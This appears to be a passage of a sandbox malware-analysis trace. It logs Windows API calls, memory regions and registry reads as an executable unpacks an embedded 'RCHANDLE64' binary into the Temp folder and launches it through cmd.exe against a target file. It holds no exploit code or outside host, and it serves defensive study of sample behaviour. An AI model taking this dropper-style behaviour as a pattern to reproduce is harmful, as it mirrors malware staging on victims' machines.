\x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™š›œ\x9džŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿ@Ā") returned 256 [0291.263] LCMapStringEx (in: lpLocaleName=0x0, dwMapFlags=0x200, lpSrcStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™š›œ\x9džŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿ@Ā", cchSrc=256, lpDestStr=0x0, cchDest=0, lpVersionInformation=0x0, lpReserved=0x0, lParam=0x0 | out: lpDestStr=0x0) returned 256 [0291.263] LCMapStringEx (in: lpLocaleName=0x0, dwMapFlags=0x200, lpSrcStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™š›œ\x9džŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿ@Ā", cchSrc=256, lpDestStr=0x19f4e8, cchDest=256, lpVersionInformation=0x0, lpReserved=0x0, lParam=0x0 | out: lpDestStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`ABCDEFGHIJKLMNOPQRSTUVWXYZ{|}~\x7f€\x81‚Ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™Š›Œ\x9dŽŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ÷ØÙÚÛÜÝÞŸȀ") returned 256 [0291.263] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`ABCDEFGHIJKLMNOPQRSTUVWXYZ{|}~\x7f€\x81‚Ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™Š›Œ\x9dŽŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ÷ØÙÚÛÜÝÞŸȀ", cchWideChar=256, lpMultiByteStr=0x19fba0, cbMultiByte=256, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="\x20\x01\x02\x03\x04\x05\x06\x07\x08\x09\x0a\x0b\x0c\x0d\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f\x20\x21\x22\x23\x24\x25\x26\x27\x28\x29\x2a\x2b\x2c\x2d\x2e\x2f\x30\x31\x32\x33\x34\x35\x36\x37\x38\x39\x3a\x3b\x3c\x3d\x3e\x3f\x40\x41\x42\x43\x44\x45\x46\x47\x48\x49\x4a\x4b\x4c\x4d\x4e\x4f\x50\x51\x52\x53\x54\x55\x56\x57\x58\x59\x5a\x5b\x5c\x5d\x5e\x5f\x60\x41\x42\x43\x44\x45\x46\x47\x48\x49\x4a\x4b\x4c\x4d\x4e\x4f\x50\x51\x52\x53\x54\x55\x56\x57\x58\x59\x5a\x7b\x7c\x7d\x7e\x7f\x80\x81\x82\x83\x84\x85\x86\x87\x88\x89\x8a\x8b\x8c\x8d\x8e\x8f\x90\x91\x92\x93\x94\x95\x96\x97\x98\x99\x8a\x9b\x8c\x9d\x8e\x9f\xa0\xa1\xa2\xa3\xa4\xa5\xa6\xa7\xa8\xa9\xaa\xab\xac\xad\xae\xaf\xb0\xb1\xb2\xb3\xb4\xb5\xb6\xb7\xb8\xb9\xba\xbb\xbc\xbd\xbe\xbf\xc0\xc1\xc2\xc3\xc4\xc5\xc6\xc7\xc8\xc9\xca\xcb\xcc\xcd\xce\xcf\xd0\xd1\xd2\xd3\xd4\xd5\xd6\xd7\xd8\xd9\xda\xdb\xdc\xdd\xde\xdf\xc0\xc1\xc2\xc3\xc4\xc5\xc6\xc7\xc8\xc9\xca\xcb\xcc\xcd\xce\xcf\xd0\xd1\xd2\xd3\xd4\xd5\xd6\xf7\xd8\xd9\xda\xdb\xdc\xdd\xde\x9f\x20\x01\x02\x03\x04\x05\x06\x07\x08\x09\x0a\x0b\x0c\x0d\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f\x20\x21\x22\x23\x24\x25\x26\x27\x28\x29\x2a\x2b\x2c\x2d\x2e\x2f\x30\x31\x32\x33\x34\x35\x36\x37\x38\x39\x3a\x3b\x3c\x3d\x3e\x3f\x40\x61\x62\x63\x64\x65\x66\x67\x68\x69\x6a\x6b\x6c\x6d\x6e\x6f\x70\x71\x72\x73\x74\x75\x76\x77\x78\x79\x7a\x5b\x5c\x5d\x5e\x5f\x60\x61\x62\x63\x64\x65\x66\x67\x68\x69\x6a\x6b\x6c\x6d\x6e\x6f\x70\x71\x72\x73\x74\x75\x76\x77\x78\x79\x7a\x7b\x7c\x7d\x7e\x7f\x80\x81\x82\x83\x84\x85\x86\x87\x88\x89\x9a\x8b\x9c\x8d\x9e\x8f\x90\x91\x92\x93\x94\x95\x96\x97\x98\x99\x9a\x9b\x9c\x9d\x9e\xff\xa0\xa1\xa2\xa3\xa4\xa5\xa6\xa7\xa8\xa9\xaa\xab\xac\xad\xae\xaf\xb0\xb1\xb2\xb3\xb4\xb5\xb6\xb7\xb8\xb9\xba\xbb\xbc\xbd\xbe\xbf\xe0\xe1\xe2\xe3\xe4\xe5\xe6\xe7\xe8\xe9\xea\xeb\xec\xed\xee\xef\xf0\xf1\xf2\xf3\xf4\xf5\xf6\xd7\xf8\xf9\xfa\xfb\xfc\xfd\xfe\xdf\xe0\xe1\xe2\xe3\xe4\xe5\xe6\xe7\xe8\xe9\xea\xeb\xec\xed\xee\xef\xf0\xf1\xf2\xf3\xf4\xf5\xf6\xf7\xf8\xf9\xfa\xfb\xfc\xfd\xfe\xff\x20\x01\x02\x03\x04\x05\x06\x07\x08\x09\x0a\x0b\x0c\x0d\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f\x20\x21\x22\x23\x24\x25\x26\x27\x28\x29\x2a\x2b\x2c\x2d\x2e\x2f\x30\x31\x32\x33\x34\x35\x36\x37\x38\x39\x3a\x3b\x3c\x3d\x3e\x3f\x40\x41\x42\x43\x44\x45\x46\x47\x48\x49\x4a\x4b\x4c\x4d\x4e\x4f\x50\x51\x52\x53\x54\x55\x56\x57\x58\x59\x5a\x5b\x5c\x5d\x5e\x5f\x60\x61\x62\x63\x64\x65\x66\x67\x68\x69\x6a\x6b\x6c\x6d\x6e\x6f\x70\x71\x72\x73\x74\x75\x76\x77\x78\x79\x7a\x7b\x7c\x7d\x7e\x7f\x80\x81\x82\x83\x84\x85\x86\x87\x88\x89\x8a\x8b\x8c\x8d\x8e\x8f\x90\x91\x92\x93\x94\x95\x96\x97\x98\x99\x9a\x9b\x9c\x9d\x9e\x9f\xa0\xa1\xa2\xa3\xa4\xa5\xa6\xa7\xa8\xa9\xaa\xab\xac\xad\xae\xaf\xb0\xb1\xb2\xb3\xb4\xb5\xb6\xb7\xb8\xb9\xba\xbb\xbc\xbd\xbe\xbf\xc0\xc1\xc2\xc3\xc4\xc5\xc6\xc7\xc8\xc9\xca\xcb\xcc\xcd\xce\xcf\xd0\xd1\xd2\xd3\xd4\xd5\xd6\xd7\xd8\xd9\xda\xdb\xdc\xdd\xde\xdf\xe0\xe1\xe2\xe3\xe4\xe5\xe6\xe7\xe8\xe9\xea\xeb\xec\xed\xee\xef\xf0\xf1\xf2\xf3\xf4\xf5\xf6\xf7\xf8\xf9\xfa\xfb\xfc\xfd\xfe\xff\x49\x77\x2f\xb8\xdc\xfe\x19", lpUsedDefaultChar=0x0) returned 256 [0291.263] IsProcessorFeaturePresent (ProcessorFeature=0xa) returned 1 [0291.263] SetUnhandledExceptionFilter (lpTopLevelExceptionFilter=0x40f584) returned 0x0 [0291.264] GetModuleHandleW (lpModuleName="kernel32.dll") returned 0x75130000 [0291.264] GetProcAddress (hModule=0x75130000, lpProcName="IsWow64Process") returned 0x751496e0 [0291.264] GetCurrentProcess () returned 0xffffffff [0291.264] IsWow64Process (in: hProcess=0xffffffff, Wow64Process=0x19ff2c | out: Wow64Process=0x19ff2c) returned 1 [0291.264] GetModuleFileNameW (in: hModule=0x0, lpFilename=0x19fd20, nSize=0x104 | out: lpFilename="C:\\Users\\CIiHmnxMn6Ps\\Desktop\\vIDhS3md.exe" (normalized: "c:\\users\\ciihmnxmn6ps\\desktop\\vidhs3md.exe")) returned 0x2a [0291.264] ExpandEnvironmentStringsW (in: lpSrc="%TEMP%", lpDst=0x19fb18, nSize=0x104 | out: lpDst="C:\\Users\\CIIHMN~1\\AppData\\Local\\Temp") returned 0x25 [0291.264] FindResourceW (hModule=0x0, lpName="RCHANDLE64", lpType="BINRES") returned 0x476060 [0291.264] LoadResource (hModule=0x0, hResInfo=0x476060) returned 0x43c648 [0291.264] SizeofResource (hModule=0x0, hResInfo=0x476060) returned 0x37490 [0291.264] LockResource (hResData=0x43c648) returned 0x43c648 [0291.264] GetCurrentPackageId () returned 0x3d54 [0291.264] CreateFileW (lpFileName="C:\\Users\\CIIHMN~1\\AppData\\Local\\Temp\\vIDhS3md64.exe" (normalized: "c:\\users\\ciihmn~1\\appdata\\local\\temp\\vidhs3md64.exe"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x19f954, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0291.593] GetLastError () returned 0x20 [0291.593] GetLastError () returned 0x20 [0291.593] SetLastError (dwErrCode=0x20) [0291.593] GetLastError () returned 0x20 [0291.593] SetLastError (dwErrCode=0x20) [0291.593] GetLastError () returned 0x20 [0291.593] SetLastError (dwErrCode=0x20) [0291.593] GetLastError () returned 0x20 [0291.593] SetLastError (dwErrCode=0x20) [0291.593] GetLastError () returned 0x20 [0291.593] SetLastError (dwErrCode=0x20) [0291.593] GetLastError () returned 0x20 [0291.593] SetLastError (dwErrCode=0x20) [0291.594] WriteFile (in: hFile=0xc0, lpBuffer=0x19ea00*, nNumberOfBytesToWrite=0x49, lpNumberOfBytesWritten=0x19e32c, lpOverlapped=0x0 | out: lpBuffer=0x19ea00*, lpNumberOfBytesWritten=0x19e32c*=0x49, lpOverlapped=0x0) returned 1 [0291.594] GetModuleHandleExW (in: dwFlags=0x0, lpModuleName="mscoree.dll", phModule=0x19fed4 | out: phModule=0x19fed4) returned 0 [0291.594] ExitProcess (uExitCode=0x1) Thread: id = 962 os_tid = 0x584 Process: id = "131" image_name = "cmd.exe" filename = "c:\\windows\\syswow64\\cmd.exe" page_root = "0x63fb7000" os_pid = "0x2b8" os_integrity_level = "0x3000" os_privileges = "0x60800000" monitor_reason = "child_process" parent_id = "83" os_parent_pid = "0xe4c" cmd_line = "C:\\Windows\\system32\\cmd.exe /c vIDhS3md.exe -accepteula \"Seyes.jtp\" -nobanner" cur_dir = "C:\\Users\\CIiHmnxMn6Ps\\Desktop\\" os_username = "LHNIWSJ\\CIiHmnxMn6Ps" os_groups = "LHNIWSJ\\Domain Users" [0x7], "Everyone" [0x7], "NT AUTHORITY\\Local account and member of Administrators group" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Local account" [0x7], "NT AUTHORITY\\Logon Session 00000000:00013c81" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Region: id = 9227 start_va = 0x870000 end_va = 0x88ffff entry_point = 0x0 region_type = private name = "private_0x0000000000870000" filename = "" Region: id = 9228 start_va = 0x890000 end_va = 0x891fff entry_point = 0x0 region_type = private name = "private_0x0000000000890000" filename = "" Region: id = 9229 start_va = 0x8a0000 end_va = 0x8b3fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000008a0000" filename = "" Region: id = 9230 start_va = 0x8c0000 end_va = 0x8fffff entry_point = 0x0 region_type = private name = "private_0x00000000008c0000" filename = "" Region: id = 9231 start_va = 0x900000 end_va = 0x9fffff entry_point = 0x0 region_type = private name = "private_0x0000000000900000" filename = "" Region: id = 9232 start_va = 0xa00000 end_va = 0xa03fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000a00000" filename = "" Region: id = 9233 start_va = 0x13d0000 end_va = 0x141ffff entry_point = 0x13d0000 region_type = mapped_file name = "cmd.exe" filename = "\\Windows\\SysWOW64\\cmd.exe" (normalized: "c:\\windows\\syswow64\\cmd.exe") Region: id = 9234 start_va = 0x1420000 end_va = 0x541ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001420000" filename = "" Region: id = 9235 start_va = 0x77990000 end_va = 0x77b08fff entry_point = 0x77990000 region_type = mapped_file name = "ntdll.dll" filename = "\\Windows\\SysWOW64\\ntdll.dll" (normalized: "c:\\windows\\syswow64\\ntdll.dll") Region: id = 9236 start_va = 0x7f0b0000 end_va = 0x7f0d2fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007f0b0000" filename = "" Region: id = 9237 start_va = 0x7f0d4000 end_va = 0x7f0d4fff entry_point = 0x0 region_type = private name = "private_0x000000007f0d4000" filename = "" Region: id = 9238 start_va = 0x7f0dc000 end_va = 0x7f0defff entry_point = 0x0 region_type = private name = "private_0x000000007f0dc000" filename = "" Region: id = 9239 start_va = 0x7f0df000 end_va = 0x7f0dffff entry_point = 0x0 region_type = private name = "private_0x000000007f0df000" filename = "" Region: id = 9240 start_va = 0x7ffe0000 end_va = 0x7ffeffff entry_point = 0x0 region_type = private name = "private_0x000000007ffe0000" filename = "" Region: id = 9241 start_va = 0x7fff0000 end_va = 0x7dfaf7a0ffff entry_point = 0x0 region_type = private name = "private_0x000000007fff0000" filename = "" Region: id = 9242 start_va = 0x7dfaf7a10000 end_va = 0x7ffaf7a0ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00007dfaf7a10000" filename = "" Region: id = 9243 start_va = 0x7ffaf7a10000 end_va = 0x7ffaf7bd1fff entry_point = 0x7ffaf7a10000 region_type = mapped_file name = "ntdll.dll" filename = "\\Windows\\System32\\ntdll.dll" (normalized: "c:\\windows\\system32\\ntdll.dll") Region: id = 9244 start_va = 0x7ffaf7bd2000 end_va = 0x7ffffffeffff entry_point = 0x0 region_type = private name = "private_0x00007ffaf7bd2000" filename = "" Region: id = 9245 start_va = 0xa10000 end_va = 0xa10fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000a10000" filename = "" Region: id = 9246 start_va = 0xa20000 end_va = 0xa21fff entry_point = 0x0 region_type = private name = "private_0x0000000000a20000" filename = "" Region: id = 9247 start_va = 0xa80000 end_va = 0xa8ffff entry_point = 0x0 region_type = private name = "private_0x0000000000a80000" filename = "" Region: id = 9248 start_va = 0x73040000 end_va = 0x7308efff entry_point = 0x73040000 region_type = mapped_file name = "wow64.dll" filename = "\\Windows\\System32\\wow64.dll" (normalized: "c:\\windows\\system32\\wow64.dll") Region: id = 9249 start_va = 0x73090000 end_va = 0x73102fff entry_point = 0x73090000 region_type = mapped_file name = "wow64win.dll" filename = "\\Windows\\System32\\wow64win.dll" (normalized: "c:\\windows\\system32\\wow64win.dll") Region: id = 9250 start_va = 0x75130000 end_va = 0x7521ffff entry_point = 0x75130000 region_type = mapped_file name = "kernel32.dll" filename = "\\Windows\\SysWOW64\\kernel32.dll" (normalized: "c:\\windows\\syswow64\\kernel32.dll") Region: id = 9251 start_va = 0x73030000 end_va = 0x73037fff entry_point = 0x73030000 region_type = mapped_file name = "wow64cpu.dll" filename = "\\Windows\\System32\\wow64cpu.dll" (normalized: "c:\\windows\\system32\\wow64cpu.dll") Region: id = 9252 start_va = 0xa90000 end_va = 0xbdffff entry_point = 0x0 region_type = private name = "private_0x0000000000a90000" filename = "" Region: id = 9253 start_va = 0x75130000 end_va = 0x7521ffff entry_point = 0x75130000 region_type = mapped_file name = "kernel32.dll" filename = "\\Windows\\SysWOW64\\kernel32.dll" (normalized: "c:\\windows\\syswow64\\kernel32.dll") Region: id = 9254 start_va = 0x74d30000 end_va = 0x74ea5fff entry_point = 0x74d30000 region_type = mapped_file name = "kernelbase.dll" filename = "\\Windows\\SysWOW64\\KernelBase.dll" (normalized: "c:\\windows\\syswow64\\kernelbase.dll") Region: id = 9255 start_va = 0x870000 end_va = 0x87ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000870000" filename = "" Region: id = 9256 start_va = 0x7efb0000 end_va = 0x7f0affff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007efb0000" filename = "" Region: id = 9301 start_va = 0xbe0000 end_va = 0xc9dfff entry_point = 0xbe0000 region_type = mapped_file name = "locale.nls" filename = "\\Windows\\System32\\locale.nls" (normalized: "c:\\windows\\system32\\locale.nls") Region: id = 9302 start_va = 0x778d0000 end_va = 0x7798dfff entry_point = 0x778d0000 region_type = mapped_file name = "msvcrt.dll" filename = "\\Windows\\SysWOW64\\msvcrt.dll" (normalized: "c:\\windows\\syswow64\\msvcrt.dll") Region: id = 9303 start_va = 0xa30000 end_va = 0xa6ffff entry_point = 0x0 region_type = private name = "private_0x0000000000a30000" filename = "" Region: id = 9304 start_va = 0xca0000 end_va = 0xd9ffff entry_point = 0x0 region_type = private name = "private_0x0000000000ca0000" filename = "" Region: id = 9305 start_va = 0xda0000 end_va = 0xdfffff entry_point = 0x0 region_type = private name = "private_0x0000000000da0000" filename = "" Region: id = 9306 start_va = 0x7f0d9000 end_va = 0x7f0dbfff entry_point = 0x0 region_type = private name = "private_0x000000007f0d9000" filename = "" Region: id = 9307 start_va = 0x880000 end_va = 0x883fff entry_point = 0x0 region_type = private name = "private_0x0000000000880000" filename = "" Region: id = 9454 start_va = 0x890000 end_va = 0x893fff entry_point = 0x0 region_type = private name = "private_0x0000000000890000" filename = "" Region: id = 9475 start_va = 0xe00000 end_va = 0x1136fff entry_point = 0xe00000 region_type = mapped_file name = "sortdefault.nls" filename = "\\Windows\\Globalization\\Sorting\\SortDefault.nls" (normalized: "c:\\windows\\globalization\\sorting\\sortdefault.nls") Thread: id = 963 os_tid = 0xe10 [0292.789] GetModuleHandleA (lpModuleName=0x0) returned 0x13d0000 [0292.789] __set_app_type (_Type=0x1) [0292.789] __p__fmode () returned 0x77984d6c [0292.789] __p__commode () returned 0x77985b1c [0292.789] SetUnhandledExceptionFilter (lpTopLevelExceptionFilter=0x13e36e0) returned 0x0 [0292.789] __getmainargs (in: _Argc=0x13f50e8, _Argv=0x13f50ec, _Env=0x13f50f0, _DoWildCard=0, _StartInfo=0x13f50fc | out: _Argc=0x13f50e8, _Argv=0x13f50ec, _Env=0x13f50f0) returned 0 [0292.790] GetCurrentThreadId () returned 0xe10 [0292.790] OpenThread (dwDesiredAccess=0x1fffff, bInheritHandle=0, dwThreadId=0xe10) returned 0x84 [0292.790] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x75130000 [0292.790] GetProcAddress (hModule=0x75130000, lpProcName="SetThreadUILanguage") returned 0x75172780 [0292.790] SetThreadUILanguage (LangId=0x0) returned 0x409 [0292.962] HeapSetInformation (HeapHandle=0x0, HeapInformationClass=0x1, HeapInformation=0x0, HeapInformationLength=0x0) returned 1 [0292.962] RegOpenKeyExW (in: hKey=0x80000001, lpSubKey="Software\\Policies\\Microsoft\\Windows\\System", ulOptions=0x0, samDesired=0x20019, phkResult=0x9ff778 | out: phkResult=0x9ff778*=0x0) returned 0x2 [0292.962] VirtualQuery (in: lpAddress=0x9ff77f, lpBuffer=0x9ff730, dwLength=0x1c | out: lpBuffer=0x9ff730*(BaseAddress=0x9ff000, AllocationBase=0x900000, AllocationProtect=0x4, RegionSize=0x1000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0292.962] VirtualQuery (in: lpAddress=0x900000, lpBuffer=0x9ff730, dwLength=0x1c | out: lpBuffer=0x9ff730*(BaseAddress=0x900000, AllocationBase=0x900000, AllocationProtect=0x4, RegionSize=0x1000, State=0x2000, Protect=0x0, Type=0x20000)) returned 0x1c [0292.962] VirtualQuery (in: lpAddress=0x901000, lpBuffer=0x9ff730, dwLength=0x1c | out: lpBuffer=0x9ff730*(BaseAddress=0x901000, AllocationBase=0x900000, AllocationProtect=0x4, RegionSize=0x2000, State=0x1000, Protect=0x104, Type=0x20000)) returned 0x1c [0292.962] VirtualQuery (in: lpAddress=0x903000, lpBuffer=0x9ff730, dwLength=0x1c | out: lpBuffer=0x9ff730*(BaseAddress=0x903000, AllocationBase=0x900000, AllocationProtect=0x4, RegionSize=0xfd000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0292.962] VirtualQuery (in: lpAddress=0xa00000, lpBuffer=0x9ff730, dwLength=0x1c | out: lpBuffer=0x9ff730*(BaseAddress=0xa00000, AllocationBase=0xa00000, AllocationProtect=0x2, RegionSize=0x4000, State=0x1000, Protect=0x2, Type=0x40000)) returned 0x1c [0292.962] GetConsoleOutputCP () returned 0x1b5 [0293.168] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0x13fe460 | out: lpCPInfo=0x13fe460) returned 1 [0293.168] SetConsoleCtrlHandler (HandlerRoutine=0x13ef980, Add=1) returned 1 [0293.169] _get_osfhandle (_FileHandle=1) returned 0xc0 [0293.169] SetConsoleMode (hConsoleHandle=0xc0, dwMode=0x0) returned 0 [0293.169] _get_osfhandle (_FileHandle=1) returned 0xc0 [0293.169] GetConsoleMode (in: hConsoleHandle=0xc0, lpMode=0x13fe40c | out: lpMode=0x13fe40c) returned 0 [0293.169] _get_osfhandle (_FileHandle=0) returned 0x38 [0293.169] GetConsoleMode (in: hConsoleHandle=0x38, lpMode=0x13fe408 | out: lpMode=0x13fe408) returned 1 [0293.262] GetEnvironmentStringsW () returned 0xae7f38* [0293.262] FreeEnvironmentStringsA (penv="=") returned 1 [0293.262] GetEnvironmentStringsW () returned 0xae7f38* [0293.262] FreeEnvironmentStringsA (penv="=") returned 1 [0293.262] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="Software\\Microsoft\\Command Processor", ulOptions=0x0, samDesired=0x2000000, phkResult=0x9fe6dc | out: phkResult=0x9fe6dc*=0x94) returned 0x0 [0293.262] RegQueryValueExW (in: hKey=0x94, lpValueName="DisableUNCCheck", lpReserved=0x0, lpType=0x9fe6e0, lpData=0x9fe6e8, lpcbData=0x9fe6e4*=0x1000 | out: lpType=0x9fe6e0*=0x0, lpData=0x9fe6e8*=0x88, lpcbData=0x9fe6e4*=0x1000) returned 0x2 [0293.262] RegQueryValueExW (in: hKey=0x94, lpValueName="EnableExtensions", lpReserved=0x0, lpType=0x9fe6e0, lpData=0x9fe6e8, lpcbData=0x9fe6e4*=0x1000 | out: lpType=0x9fe6e0*=0x4, lpData=0x9fe6e8*=0x1, lpcbData=0x9fe6e4*=0x4) returned 0x0 [0293.262] RegQueryValueExW (in: hKey=0x94, lpValueName="DelayedExpansion", lpReserved=0x0, lpType=0x9fe6e0, lpData=0x9fe6e8, lpcbData=0x9fe6e4*=0x1000 | out: lpType=0x9fe6e0*=0x0, lpData=0x9fe6e8*=0x1, lpcbData=0x9fe6e4*=0x1000) returned 0x2 [0293.262] RegQueryValueExW (in: hKey=0x94, lpValueName="DefaultColor", lpReserved=0x0, lpType=0x9fe6e0, lpData=0x9fe6e8, lpcbData=0x9fe6e4*=0x1000 | out: lpType=0x9fe6e0*=0x4, lpData=0x9fe6e8*=0x0, lpcbData=0x9fe6e4*=0x4) returned 0x0 [0293.262] RegQueryValueExW (in: hKey=0x94, lpValueName="CompletionChar", lpReserved=0x0, lpType=0x9fe6e0, lpData=0x9fe6e8, lpcbData=0x9fe6e4*=0x1000 | out: lpType=0x9fe6e0*=0x4, lpData=0x9fe6e8*=0x40, lpcbData=0x9fe6e4*=0x4) returned 0x0 [0293.262] RegQueryValueExW (in: hKey=0x94, lpValueName="PathCompletionChar", lpReserved=0x0, lpType=0x9fe6e0, lpData=0x9fe6e8, lpcbData=0x9fe6e4*=0x1000 | out: lpType=0x9fe6e0*=0x4, lpData=0x9fe6e8*=0x40, lpcbData=0x9fe6e4*=0x4) returned 0x0 [0293.262] RegQueryValueExW (in: hKey=0x94, lpValueName="AutoRun", lpReserved=0x0, lpType=0x9fe6e0, lpData=0x9fe6e8, lpcbData=0x9fe6e4*=0x1000 | out: lpType=0x9fe6e0*=0x0, lpData=0x9fe6e8*=0x40, lpcbData=0x9fe6e4*=0x1000) returned 0x2 [0293.262] RegCloseKey (hKey=0x94) returned 0x0 [0293.263] RegOpenKeyExW (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Command Processor", ulOptions=0x0, samDesired=0x2000000, phkResult=0x9fe6dc | out: phkResult=0x9fe6dc*=0x94) returned 0x0 [0293.263] RegQueryValueExW (in: hKey=0x94, lpValueName="DisableUNCCheck", lpReserved=0x0, lpType=0x9fe6e0, lpData=0x9fe6e8, lpcbData=0x9fe6e4*=0x1000 | out: lpType=0x9fe6e0*=0x0, lpData=0x9fe6e8*=0x40, lpcbData=0x9fe6e4*=0x1000) returned 0x2 [0293.263] RegQueryValueExW (in: hKey=0x94, lpValueName="EnableExtensions", lpReserved=0x0, lpType=0x9fe6e0, lpData=0x9fe6e8, lpcbData=0x9fe6e4*=0x1000 | out: lpType=0x9fe6e0*=0x4, lpData=0x9fe6e8*=0x1, lpcbData=0x9fe6e4*=0x4) returned 0x0 [0293.263] RegQueryValueExW (in: hKey=0x94, lpValueName="DelayedExpansion", lpReserved=0x0, lpType=0x9fe6e0, lpData=0x9fe6e8, lpcbData=0x9fe6e4*=0x1000 | out: lpType=0x9fe6e0*=0x0, lpData=0x9fe6e8*=0x1, lpcbData=0x9fe6e4*=0x1000) returned 0x2 [0293.263] RegQueryValueExW (in: hKey=0x94, lpValueName="DefaultColor", lpReserved=0x0, lpType=0x9fe6e0, lpData=0x9fe6e8, lpcbData=0x9fe6e4*=0x1000 | out: lpType=0x9fe6e0*=0x4, lpData=0x9fe6e8*=0x0, lpcbData=0x9fe6e4*=0x4) returned 0x0 [0293.263] RegQueryValueExW (in: hKey=0x94, lpValueName="CompletionChar", lpReserved=0x0, lpType=0x9fe6e0, lpData=0x9fe6e8, lpcbData=0x9fe6e4*=0x1000 | out: lpType=0x9fe6e0*=0x4, lpData=0x9fe6e8*=0x9, lpcbData=0x9fe6e4*=0x4) returned 0x0 [0293.263] RegQueryValueExW (in: hKey=0x94, lpValueName="PathCompletionChar", lpReserved=0x0, lpType=0x9fe6e0, lpData=0x9fe6e8, lpcbData=0x9fe6e4*=0x1000 | out: lpType=0x9fe6e0*=0x4, lpData=0x9fe6e8*=0x9, lpcbData=0x9fe6e4*=0x4) returned 0x0 [0293.263] RegQueryValueExW (in: hKey=0x94, lpValueName="AutoRun", lpReserved=0x0, lpType=0x9fe6e0, 